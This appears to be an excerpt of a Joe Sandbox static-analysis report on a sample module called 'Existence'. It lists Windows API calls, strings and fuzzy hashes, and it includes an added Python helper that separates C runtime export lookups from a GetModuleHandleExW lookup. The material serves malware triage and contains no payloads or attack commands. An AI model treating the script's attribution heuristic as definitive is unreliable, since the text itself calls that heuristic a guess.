                                                                                                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007A4A9E
                                                                                                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007A4ACC
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                                                                                                                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                                          • API String ID: 1839972693-4113822522
                                                                                                                                                                                          • Opcode ID: 97f24f3df6d7eeee2560e220bbf5160f3383c776b2490277b8fdf065ea4f3c3d
                                                                                                                                                                                          • Instruction ID: 87013a4459f5baeb5aafd3d60fabf85522a60a5e62c88a583d0c90b3cdf2560b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 97f24f3df6d7eeee2560e220bbf5160f3383c776b2490277b8fdf065ea4f3c3d
                                                                                                                                                                                          • Instruction Fuzzy Hash: D871E0726082058FC710EF24C84096BB7E8EFD5758F008A2DF89597262EB7AED45CB91
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadIconW.USER32(00000063), ref: 00796395
                                                                                                                                                                                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 007963A7
                                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 007963BE
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 007963D3
                                                                                                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 007963D9
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 007963E9
                                                                                                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 007963EF
                                                                                                                                                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00796410
                                                                                                                                                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0079642A
                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00796433
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0079649A
                                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 007964D6
                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 007964DC
                                                                                                                                                                                          • GetWindowRect.USER32(00000000), ref: 007964E3
                                                                                                                                                                                          • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 0079653A
                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 00796547
                                                                                                                                                                                          • PostMessageW.USER32(?,00000005,00000000,?), ref: 0079656C
                                                                                                                                                                                          • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00796596
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 895679908-0
                                                                                                                                                                                          • Opcode ID: dde63d35ce8cc8d781cf1d27a731777d6220fe1e58742e34c3a8ff4548aa4753
                                                                                                                                                                                          • Instruction ID: c954ee071af9abe6ef18337483487389a9cb55a6163fab5ad4878e7d572e9f39
                                                                                                                                                                                          • Opcode Fuzzy Hash: dde63d35ce8cc8d781cf1d27a731777d6220fe1e58742e34c3a8ff4548aa4753
                                                                                                                                                                                          • Instruction Fuzzy Hash: 89714B71900605AFDF20DFA8DE49AAEBBF5FB48704F10462CE586A25A0D779ED44CB50
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F89), ref: 007B0884
                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F8A), ref: 007B088F
                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 007B089A
                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F03), ref: 007B08A5
                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F8B), ref: 007B08B0
                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F01), ref: 007B08BB
                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F81), ref: 007B08C6
                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F88), ref: 007B08D1
                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F80), ref: 007B08DC
                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F86), ref: 007B08E7
                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F83), ref: 007B08F2
                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F85), ref: 007B08FD
                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F82), ref: 007B0908
                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F84), ref: 007B0913
                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F04), ref: 007B091E
                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 007B0929
                                                                                                                                                                                          • GetCursorInfo.USER32(?), ref: 007B0939
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 007B097B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3215588206-0
                                                                                                                                                                                          • Opcode ID: f783f81d0ed54a19f33bf0937461052399813c8bbe1ef6bda6785afd7188a088
                                                                                                                                                                                          • Instruction ID: 2201a3fc7d422ce5ba5e5fe90cc1f8479392acdcf26c2a2e0d752a02d03eebc6
                                                                                                                                                                                          • Opcode Fuzzy Hash: f783f81d0ed54a19f33bf0937461052399813c8bbe1ef6bda6785afd7188a088
                                                                                                                                                                                          • Instruction Fuzzy Hash: F14144B0D08319AADB109FBA8C89D5EBFE8FF04754B50452AE15CE7291DA78A901CF91
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00750436
                                                                                                                                                                                            • Part of subcall function 0075045D: InitializeCriticalSectionAndSpinCount.KERNEL32(0080170C,00000FA0,B9C7C235,?,?,?,?,00772733,000000FF), ref: 0075048C
                                                                                                                                                                                            • Part of subcall function 0075045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00772733,000000FF), ref: 00750497
                                                                                                                                                                                            • Part of subcall function 0075045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00772733,000000FF), ref: 007504A8
                                                                                                                                                                                            • Part of subcall function 0075045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 007504BE
                                                                                                                                                                                            • Part of subcall function 0075045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 007504CC
                                                                                                                                                                                            • Part of subcall function 0075045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 007504DA
                                                                                                                                                                                            • Part of subcall function 0075045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00750505
                                                                                                                                                                                            • Part of subcall function 0075045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00750510
                                                                                                                                                                                          • ___scrt_fastfail.LIBCMT ref: 00750457
                                                                                                                                                                                            • Part of subcall function 00750413: __onexit.LIBCMT ref: 00750419
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • kernel32.dll, xrefs: 007504A3
                                                                                                                                                                                          • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00750492
                                                                                                                                                                                          • InitializeConditionVariable, xrefs: 007504B8
                                                                                                                                                                                          • SleepConditionVariableCS, xrefs: 007504C4
                                                                                                                                                                                          • WakeAllConditionVariable, xrefs: 007504D2
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                                                                                                          • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                          • API String ID: 66158676-1714406822
                                                                                                                                                                                          • Opcode ID: 5ce7391efe438e0f7745462425f06be4d76e5fd5a198ad7721f769ffa37d00b2
                                                                                                                                                                                          • Instruction ID: fd7746ea448641a420b3df9955f3ba65026be7e962b4f9ccedccab527bd6c8ac
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5ce7391efe438e0f7745462425f06be4d76e5fd5a198ad7721f769ffa37d00b2
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A21F972A44708ABD7212BA49C0AFE977E5EF05B62F14413AFD0592280EBFC9C048AD5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%
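
The record above and the LoadLibraryA/GetProcAddress(GetModuleHandleExW) record at 007B4B18 later in this listing both show exports being resolved at run time, which sandbox heuristics commonly score as "dynamic API resolution". The two cases differ: the API ID of the record above names __scrt_initialize_thread_safe_statics_platform_specific, the MSVC CRT start-up routine that names api-ms-win-core-synch-l1-2-0.dll and then kernel32.dll before looking up the three condition-variable exports, so those lookups are compiler runtime code present in any MSVC build, not sample logic. The GetModuleHandleExW lookup is not attributable to the CRT from what the report shows and is the one worth reviewing. The script below is an added triage helper, not part of the Joe Sandbox report or the sample; it parses call lines in the exact "Api.MODULE(args), ref: addr" format used in these records (the sample input is copied from the two records named), pairs each GetProcAddress with the module names that immediately precede it, and separates the known CRT lookups from the rest. The attribution of a lookup to the most recently named modules is a heuristic of this script, not something the report states.

```python
"""Triage GetProcAddress chains in a Joe Sandbox-style API trace (added example)."""
import re
from typing import NamedTuple

# Constructed input: call lines copied from two records of the 0x730000 module in
# process 0xA. Leading bullets and the "Part of subcall function NNNN:" prefix are
# accepted and stripped by the parser below.
TRACE = """\
• Part of subcall function 0075045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00772733,000000FF), ref: 00750497
• Part of subcall function 0075045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00772733,000000FF), ref: 007504A8
• Part of subcall function 0075045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 007504BE
• Part of subcall function 0075045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 007504CC
• Part of subcall function 0075045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 007504DA
• Part of subcall function 0075045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00750505
• LoadLibraryA.KERNEL32(kernel32.dll,?,007CDCD0), ref: 007B4B18
• GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 007B4B2A
• GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,007CDCD0), ref: 007B4B4F
• FreeLibrary.KERNEL32(00000000,?,007CDCD0), ref: 007B4B9B
"""

# "Api.MODULE(arg,arg,...), ref: ADDR" or, for CRT-internal calls, "Api.MODULE ref: ADDR".
CALL_RE = re.compile(
    r"^(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$"
)
PREFIX_RE = re.compile(r"^\s*•?\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?")

# Calls that name the module whose export a following GetProcAddress will look up.
LOADERS = {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW",
           "GetModuleHandleA", "GetModuleHandleW"}

# Exports resolved by MSVC's __scrt_initialize_thread_safe_statics_platform_specific,
# the CRT routine named in the record's API ID; they are compiler boilerplate.
CRT_THREAD_SAFE_STATICS = {
    "InitializeConditionVariable", "SleepConditionVariableCS", "WakeAllConditionVariable",
}


class Call(NamedTuple):
    api: str
    module: str
    args: tuple
    ref: str


class Resolution(NamedTuple):
    candidates: tuple  # modules named just before the lookup, in call order
    target: str        # export name passed to GetProcAddress
    ref: str           # address of the GetProcAddress call site


def parse_trace(text):
    """Parse trace lines into Call records; unknown line shapes are an error."""
    calls = []
    for raw in text.splitlines():
        line = PREFIX_RE.sub("", raw).strip()
        if not line:
            continue
        m = CALL_RE.match(line)
        if not m:
            raise ValueError(f"unparsed trace line: {raw!r}")
        args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
        calls.append(Call(m["api"], m["module"], args, m["ref"]))
    return calls


def resolve_chains(calls):
    """Pair each GetProcAddress with the module names that directly precede it.

    Heuristic: the handle argument is unresolved in static output (00000000), so the
    module is taken from the loader calls seen since the last unrelated call.
    """
    chains, libs, in_group = [], [], False
    for c in calls:
        if c.api in LOADERS:
            if in_group:          # a load after a lookup group starts a new chain
                libs = []
            libs.append(c.args[0])
            in_group = False
        elif c.api == "GetProcAddress" and len(c.args) >= 2:
            chains.append(Resolution(tuple(libs), c.args[1], c.ref))
            in_group = True
        else:                     # any other call ends the current chain
            libs, in_group = [], False
    return chains


def classify(res):
    """'crt-boilerplate' for the known CRT lookups, 'review' for everything else."""
    return "crt-boilerplate" if res.target in CRT_THREAD_SAFE_STATICS else "review"


def triage(text):
    """Map verdict -> list of 'ref target <- candidate modules' strings."""
    out = {"crt-boilerplate": [], "review": []}
    for r in resolve_chains(parse_trace(text)):
        out[classify(r)].append(f"{r.ref} {r.target} <- {'|'.join(r.candidates)}")
    return out


if __name__ == "__main__":
    for verdict, items in triage(TRACE).items():
        print(verdict)
        for item in items:
            print("  " + item)
```

Running it lists the three condition-variable lookups under crt-boilerplate with both candidate modules, and GetModuleHandleExW under review, attributed to kernel32.dll. Extend CRT_THREAD_SAFE_STATICS only with exports you have tied to a specific runtime routine, as done here from the record's API ID; an open-ended allowlist would hide exactly the lookups the heuristic exists to surface.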

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _wcslen
                                                                                                                                                                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                                                          • API String ID: 176396367-1603158881
                                                                                                                                                                                          • Opcode ID: 66bc04cca2cfb6c88fdfda06b0673dae9432e7e548437c99fa59cb3dfbb8b5aa
                                                                                                                                                                                          • Instruction ID: 7b3a29c34d6452fc6296682a8e60a19778fa4f09340cc5e0e6ffb3b1505f063a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 66bc04cca2cfb6c88fdfda06b0673dae9432e7e548437c99fa59cb3dfbb8b5aa
                                                                                                                                                                                          • Instruction Fuzzy Hash: A4E1F272E00516EBCF28DFB8D8556FEBBB1BF54710F104129E556E7240DB38AE8987A0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CharLowerBuffW.USER32(00000000,00000000,007CDCD0), ref: 007A4F6C
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007A4F80
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007A4FDE
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007A5039
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007A5084
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007A50EC
                                                                                                                                                                                            • Part of subcall function 0074FD52: _wcslen.LIBCMT ref: 0074FD5D
                                                                                                                                                                                          • GetDriveTypeW.KERNEL32(?,007F7C10,00000061), ref: 007A5188
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                                                                                                          • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                                          • API String ID: 2055661098-1000479233
                                                                                                                                                                                          • Opcode ID: e4ad631b0e9d8e5ad4016c0fa1bc937205a136ba124bb2a4202d46c5dbd6b179
                                                                                                                                                                                          • Instruction ID: cdde81e08c80373f321de6531b95e51c5591130936dd02d74a38160ae4b28c17
                                                                                                                                                                                          • Opcode Fuzzy Hash: e4ad631b0e9d8e5ad4016c0fa1bc937205a136ba124bb2a4202d46c5dbd6b179
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7EB1F371608702DFC714DF28C890A7BB7E5BFE6724F104A1DF59687292D778D884CAA2
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007BBBF8
                                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 007BBC10
                                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 007BBC34
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007BBC60
                                                                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 007BBC74
                                                                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 007BBC96
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007BBD92
                                                                                                                                                                                            • Part of subcall function 007A0F4E: GetStdHandle.KERNEL32(000000F6), ref: 007A0F6D
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007BBDAB
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007BBDC6
                                                                                                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 007BBE16
                                                                                                                                                                                          • GetLastError.KERNEL32(00000000), ref: 007BBE67
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 007BBE99
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 007BBEAA
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 007BBEBC
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 007BBECE
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 007BBF43
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2178637699-0
                                                                                                                                                                                          • Opcode ID: 0e55861a9b80f00f970b07deef0e2192aec80c51ada78c69aea7b5a7148af393
                                                                                                                                                                                          • Instruction ID: 25526cf8a1535d9769bbadbcb85edb67807f1a79f3e255bf295a231fe633cf60
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e55861a9b80f00f970b07deef0e2192aec80c51ada78c69aea7b5a7148af393
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8AF1AF71604340DFD714EF24C895BAABBE1BF85314F14895DF8858B2A2CBB9EC45CB92
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,007CDCD0), ref: 007B4B18
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 007B4B2A
                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,007CDCD0), ref: 007B4B4F
                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,007CDCD0), ref: 007B4B9B
                                                                                                                                                                                          • StringFromGUID2.OLE32(?,?,00000028,?,007CDCD0), ref: 007B4C05
                                                                                                                                                                                          • SysFreeString.OLEAUT32(00000009), ref: 007B4CBF
                                                                                                                                                                                          • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 007B4D25
                                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 007B4D4F
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                                                                                                                                          • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                                                          • API String ID: 354098117-199464113
                                                                                                                                                                                          • Opcode ID: ecb9a001797cff8bbc8bfe7ddc59a5c1b9e4e1b1c983a07e2bac2c632a65e891
                                                                                                                                                                                          • Instruction ID: 1c2f3876684e1204deef6e1b085b69809d80bbc180cf36f586f61913fa4a6415
                                                                                                                                                                                          • Opcode Fuzzy Hash: ecb9a001797cff8bbc8bfe7ddc59a5c1b9e4e1b1c983a07e2bac2c632a65e891
                                                                                                                                                                                          • Instruction Fuzzy Hash: C6120971A00115EFDB14DF94C888EAEBBB5FF45314F248098F909AB252DB35ED46CBA0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• GetMenuItemCount.USER32(008029C0), ref: 00773F72
• GetMenuItemCount.USER32(008029C0), ref: 00774022
• GetCursorPos.USER32(?), ref: 00774066
• SetForegroundWindow.USER32(00000000), ref: 0077406F
• TrackPopupMenuEx.USER32(008029C0,00000000,?,00000000,00000000,00000000), ref: 00774082
• PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0077408E
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
• String ID: 0
• API String ID: 36266755-4108050209
• Opcode ID: 8eecdb2095c30710c218648320b2d4c5e45c94074ef689557d4fb8eb1e3650e0
• Instruction ID: da742513205f828bc2ccf466945e8e5f97e2e75fb7295f6f779e921dff2a17ca
• Opcode Fuzzy Hash: 8eecdb2095c30710c218648320b2d4c5e45c94074ef689557d4fb8eb1e3650e0
• Instruction Fuzzy Hash: FD71E330645205BAFF318B28DC49FAABF64FF043A4F108219F628A61E1C7B99D10D751
Uniqueness
• Uniqueness Score: -1.00%

APIs
• DestroyWindow.USER32(00000000,?), ref: 007C7823
  • Part of subcall function 00738577: _wcslen.LIBCMT ref: 0073858A
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 007C7897
• SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 007C78B9
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007C78CC
• DestroyWindow.USER32(?), ref: 007C78ED
